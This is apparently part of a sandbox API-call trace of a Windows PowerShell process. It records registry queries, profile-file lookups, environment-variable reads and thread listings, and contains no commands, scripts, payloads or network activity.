	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.330] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.330] CoTaskMemFree (pv=0x290b70) 
	[0432.332] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.332] CoTaskMemFree (pv=0x290b70) 
	[0432.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.442] VirtualQuery (in: lpAddress=0x18bea0, lpBuffer=0x18cd60, dwLength=0x30 | out: lpBuffer=0x18cd60*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.446] VirtualQuery (in: lpAddress=0x18bea0, lpBuffer=0x18cd60, dwLength=0x30 | out: lpBuffer=0x18cd60*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.446] VirtualQuery (in: lpAddress=0x18b6f0, lpBuffer=0x18c5b0, dwLength=0x30 | out: lpBuffer=0x18c5b0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.446] VirtualQuery (in: lpAddress=0x18b6f0, lpBuffer=0x18c5b0, dwLength=0x30 | out: lpBuffer=0x18c5b0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.447] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dcf8 | out: phkResult=0x18dcf8*=0x330) returned 0x0
	[0432.447] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18dc7c, lpData=0x0, lpcbData=0x18dc78*=0x0 | out: lpType=0x18dc7c*=0x1, lpData=0x0, lpcbData=0x18dc78*=0x56) returned 0x0
	[0432.447] CoTaskMemAlloc (cb=0x5a) returned 0x1eb940
	[0432.447] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18dc4c, lpData=0x1eb940, lpcbData=0x18dc48*=0x56 | out: lpType=0x18dc4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18dc48*=0x56) returned 0x0
	[0432.447] CoTaskMemFree (pv=0x1eb940) 
	[0432.447] RegCloseKey (hKey=0x330) returned 0x0
	[0432.447] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dcf8 | out: phkResult=0x18dcf8*=0x330) returned 0x0
	[0432.447] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18dc7c, lpData=0x0, lpcbData=0x18dc78*=0x0 | out: lpType=0x18dc7c*=0x1, lpData=0x0, lpcbData=0x18dc78*=0x56) returned 0x0
	[0432.447] CoTaskMemAlloc (cb=0x5a) returned 0x1eb940
	[0432.447] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18dc4c, lpData=0x1eb940, lpcbData=0x18dc48*=0x56 | out: lpType=0x18dc4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18dc48*=0x56) returned 0x0
	[0432.448] CoTaskMemFree (pv=0x1eb940) 
	[0432.448] RegCloseKey (hKey=0x330) returned 0x0
	[0432.448] CoTaskMemAlloc (cb=0x20c) returned 0x1b33cff0
	[0432.448] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b33cff0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0432.448] CoTaskMemFree (pv=0x1b33cff0) 
	[0432.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0432.448] CoTaskMemAlloc (cb=0x20c) returned 0x1b33cff0
	[0432.448] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b33cff0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0432.448] CoTaskMemFree (pv=0x1b33cff0) 
	[0432.448] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x18d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0432.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x18da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0432.449] SetErrorMode (uMode=0x1) returned 0x1
	[0432.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18dc60 | out: lpFileInformation=0x18dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.449] SetErrorMode (uMode=0x1) returned 0x1
	[0432.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x18da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0432.449] SetErrorMode (uMode=0x1) returned 0x1
	[0432.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18dc60 | out: lpFileInformation=0x18dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.450] SetErrorMode (uMode=0x1) returned 0x1
	[0432.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x18da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0432.450] SetErrorMode (uMode=0x1) returned 0x1
	[0432.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18dc60 | out: lpFileInformation=0x18dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.450] SetErrorMode (uMode=0x1) returned 0x1
	[0432.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x18da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0432.450] SetErrorMode (uMode=0x1) returned 0x1
	[0432.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18dc60 | out: lpFileInformation=0x18dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0432.450] SetErrorMode (uMode=0x1) returned 0x1
	[0432.451] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.451] CoTaskMemFree (pv=0x290b70) 
	[0432.451] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.451] CoTaskMemFree (pv=0x290b70) 
	[0432.451] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.451] CoTaskMemFree (pv=0x290b70) 
	[0432.452] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.452] CoTaskMemFree (pv=0x290b70) 
	[0432.456] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.457] CoTaskMemFree (pv=0x290b70) 
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1bc
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2fc
	[0432.458] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x300
	[0432.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x374
	[0432.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378
	[0432.459] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0432.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0432.459] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0432.461] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.461] CoTaskMemFree (pv=0x290b70) 
	[0432.463] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0432.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x18de40 | out: lpMode=0x18de40) returned 1
	[0432.466] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.466] CoTaskMemFree (pv=0x290b70) 
	[0432.470] SetEvent (hEvent=0x1c4) returned 1
	[0432.470] SetEvent (hEvent=0x330) returned 1
	[0432.470] SetEvent (hEvent=0x334) returned 1
	[0432.470] SetEvent (hEvent=0x338) returned 1
	[0432.470] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0432.472] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.472] CoTaskMemFree (pv=0x290b70) 
	[0432.473] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db98 | out: phkResult=0x18db98*=0x350) returned 0x0
	[0432.473] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x18db1c, lpData=0x0, lpcbData=0x18db18*=0x0 | out: lpType=0x18db1c*=0x0, lpData=0x0, lpcbData=0x18db18*=0x0) returned 0x2

Thread:
	id = 243
	os_tid = 0xd08


Thread:
	id = 253
	os_tid = 0xd48


Thread:
	id = 537
	os_tid = 0x1388


Thread:
	id = 540
	os_tid = 0x13a0


Thread:
	id = 547
	os_tid = 0x13d0


Thread:
	id = 565
	os_tid = 0xcc0


Thread:
	id = 568
	os_tid = 0xc04

	[0394.027] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0421.516] LocalFree (hMem=0x1f72c0) returned 0x0
	[0421.517] CloseHandle (hObject=0x314) returned 1
	[0421.517] CloseHandle (hObject=0x13) returned 1
	[0421.517] CloseHandle (hObject=0xf) returned 1
	[0421.518] RegCloseKey (hKey=0x300) returned 0x0
	[0421.518] RegCloseKey (hKey=0x2fc) returned 0x0
	[0421.518] RegCloseKey (hKey=0x2f8) returned 0x0
	[0421.518] LocalFree (hMem=0x1f7290) returned 0x0
	[0421.518] RegCloseKey (hKey=0x324) returned 0x0
	[0426.272] RegCloseKey (hKey=0x1bc) returned 0x0
	[0429.330] RegCloseKey (hKey=0x314) returned 0x0
	[0429.331] RegCloseKey (hKey=0x300) returned 0x0
	[0429.331] RegCloseKey (hKey=0x2fc) returned 0x0
	[0429.331] RegCloseKey (hKey=0x1bc) returned 0x0
	[0429.331] RegCloseKey (hKey=0x1c4) returned 0x0
	[0429.331] RegCloseKey (hKey=0x338) returned 0x0
	[0429.332] RegCloseKey (hKey=0x334) returned 0x0
	[0429.332] RegCloseKey (hKey=0x330) returned 0x0
	[0429.332] RegCloseKey (hKey=0x32c) returned 0x0
	[0429.332] RegCloseKey (hKey=0x328) returned 0x0
	[0431.351] RegCloseKey (hKey=0x370) returned 0x0
	[0431.352] RegCloseKey (hKey=0x36c) returned 0x0
	[0431.352] RegCloseKey (hKey=0x368) returned 0x0
	[0431.352] RegCloseKey (hKey=0x364) returned 0x0
	[0431.352] RegCloseKey (hKey=0x314) returned 0x0
	[0431.353] RegCloseKey (hKey=0x37c) returned 0x0
	[0431.353] RegCloseKey (hKey=0x35c) returned 0x0
	[0431.353] RegCloseKey (hKey=0x358) returned 0x0
	[0431.353] RegCloseKey (hKey=0x354) returned 0x0
	[0431.354] RegCloseKey (hKey=0x350) returned 0x0
	[0431.354] RegCloseKey (hKey=0x34c) returned 0x0
	[0431.354] RegCloseKey (hKey=0x348) returned 0x0
	[0431.354] RegCloseKey (hKey=0x344) returned 0x0
	[0431.354] RegCloseKey (hKey=0x328) returned 0x0
	[0431.355] RegCloseKey (hKey=0x378) returned 0x0
	[0431.355] RegCloseKey (hKey=0x374) returned 0x0
	[0431.355] RegCloseKey (hKey=0x300) returned 0x0
	[0431.355] RegCloseKey (hKey=0x2fc) returned 0x0
	[0431.356] RegCloseKey (hKey=0x1bc) returned 0x0
	[0431.356] RegCloseKey (hKey=0x1c4) returned 0x0
	[0431.356] RegCloseKey (hKey=0x338) returned 0x0
	[0431.356] RegCloseKey (hKey=0x334) returned 0x0
	[0431.357] RegCloseKey (hKey=0x330) returned 0x0
	[0431.357] RegCloseKey (hKey=0x32c) returned 0x0
	[0641.403] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 649
	os_tid = 0x1454


Thread:
	id = 682
	os_tid = 0x155c

	[0432.638] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0432.642] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0432.645] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.646] CoTaskMemFree (pv=0x290b70) 
	[0432.647] VirtualQuery (in: lpAddress=0x1c6ede40, lpBuffer=0x1c6eed00, dwLength=0x30 | out: lpBuffer=0x1c6eed00*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.649] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.650] CoTaskMemFree (pv=0x290b70) 
	[0432.652] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.652] CoTaskMemFree (pv=0x290b70) 
	[0432.655] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.655] CoTaskMemFree (pv=0x290b70) 
	[0432.669] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.669] CoTaskMemFree (pv=0x290b70) 
	[0432.671] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.671] CoTaskMemFree (pv=0x290b70) 
	[0432.672] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.672] CoTaskMemFree (pv=0x290b70) 
	[0432.676] VirtualQuery (in: lpAddress=0x1c6ee0f0, lpBuffer=0x1c6eefb0, dwLength=0x30 | out: lpBuffer=0x1c6eefb0*(BaseAddress=0x1c6ee000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.677] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.677] CoTaskMemFree (pv=0x290b70) 
	[0432.679] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.679] CoTaskMemFree (pv=0x290b70) 
	[0432.679] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.679] CoTaskMemFree (pv=0x290b70) 
	[0432.680] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.680] CoTaskMemFree (pv=0x290b70) 
	[0432.684] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0432.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.684] CoTaskMemFree (pv=0x290b70) 
	[0433.392] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.392] CoTaskMemFree (pv=0x290b70) 
	[0433.395] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.395] CoTaskMemFree (pv=0x290b70) 
	[0433.396] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.396] CoTaskMemFree (pv=0x290b70) 
	[0433.399] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.399] CoTaskMemFree (pv=0x290b70) 
	[0433.400] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.400] CoTaskMemFree (pv=0x290b70) 
	[0433.402] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.402] CoTaskMemFree (pv=0x290b70) 
	[0433.404] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.404] CoTaskMemFree (pv=0x290b70) 
	[0433.891] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0433.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.891] CoTaskMemFree (pv=0x290b70) 
	[0435.099] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0435.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0435.100] CoTaskMemFree (pv=0x290b70) 
	[0435.809] CoTaskMemAlloc (cb=0x104) returned 0x290b70
	[0435.809] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x290b70, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0435.809] CoTaskMemFree (pv=0x290b70) 
	[0435.809] CoTaskMemAlloc (cb=0x128) returned 0x1b347b60
	[0435.809] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b347b60, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0435.809] CoTaskMemFree (pv=0x1b347b60) 
	[0435.814] CoTaskMemAlloc (cb=0x20e) returned 0x1b33ec60
	[0435.814] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b33ec60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0435.814] CoTaskMemFree (pv=0x1b33ec60) 
	[0435.818] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0435.819] SetErrorMode (uMode=0x1) returned 0x1
	[0435.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0435.832] SetErrorMode (uMode=0x1) returned 0x1
	[0435.833] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0435.834] SetErrorMode (uMode=0x1) returned 0x1
